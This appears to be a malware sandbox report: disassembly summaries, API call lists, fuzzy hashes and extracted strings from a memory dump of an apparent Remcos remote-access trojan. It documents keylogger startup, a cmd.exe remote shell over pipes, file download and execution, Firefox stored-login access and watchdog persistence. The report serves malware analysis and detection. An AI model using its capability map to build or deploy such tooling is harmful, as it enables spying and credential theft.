                                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                  • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID: !D@$NG
                                                  • API String ID: 180926312-2721294649
                                                  • Opcode ID: 8033d7c0323991a8c44f66dfc59215900a10c49b8716d1ce4b95416d8ef397f7
                                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                  • Opcode Fuzzy Hash: 8033d7c0323991a8c44f66dfc59215900a10c49b8716d1ce4b95416d8ef397f7
                                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                  • Opcode Fuzzy Hash: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                  • Opcode Fuzzy Hash: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                  • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                  • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                  • Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                  • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                  • Opcode Fuzzy Hash: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                  • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                  • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: SG
                                                  • API String ID: 1925916568-3189917014
                                                  • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                  • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                  • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                  • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • RegQueryValueExA.KERNEL32 ref: 00413622
                                                  • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                  • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                  • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                  • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                  • RegQueryValueExA.KERNEL32 ref: 00413768
                                                  • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                  • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                  • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                  • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
• RegQueryValueExA.KERNEL32 ref: 004135C2
• RegCloseKey.KERNEL32(?), ref: 004135CD
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
• RegQueryValueExA.KERNEL32 ref: 00413565
• RegCloseKey.KERNEL32(?), ref: 00413570
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
• RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
• RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID:
APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
Strings
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Info
• String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID: pQG
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
Strings
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: String
• String ID: LCMapStringEx
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
Strings
• InitializeCriticalSectionEx, xrefs: 00448B1F
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Alloc
• String ID: FlsAlloc
APIs
• try_get_function.LIBVCRUNTIME ref: 00438E29
Strings
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: try_get_function
• String ID: FlsAlloc
APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
Strings
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
APIs
  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
• GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CodeInfoPageValid
• String ID:
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
  • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
• _free.LIBCMT ref: 0044F050
• _free.LIBCMT ref: 0044F086
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast_abort
• String ID:
APIs
• GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressProc__crt_fast_encode_pointer
• String ID:
APIs
• _free.LIBCMT ref: 00446227
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
• HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Heap$AllocAllocate_free
• String ID:
APIs
• socket.WS2_32(?,00000001,00000006), ref: 00404852
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
APIs
• GetForegroundWindow.USER32 ref: 0041BB49
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundText
• String ID:
APIs
  • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
• String ID:
APIs
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: __alldvrm
• String ID:
APIs
• RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
Memory Dump Source
• Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
                                                  • API String ID: 1279760036-0
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  APIs
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  APIs
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                  • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                  • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                  Strings
                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                  • API String ID: 1067849700-181434739
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                  • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                  Strings
                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                  • API String ID: 2994406822-18413064
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                  • OpenMutexA.KERNEL32 ref: 00412181
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                  Strings
                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                  • API String ID: 3018269243-13974260
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                  Strings
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 004168FD
                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
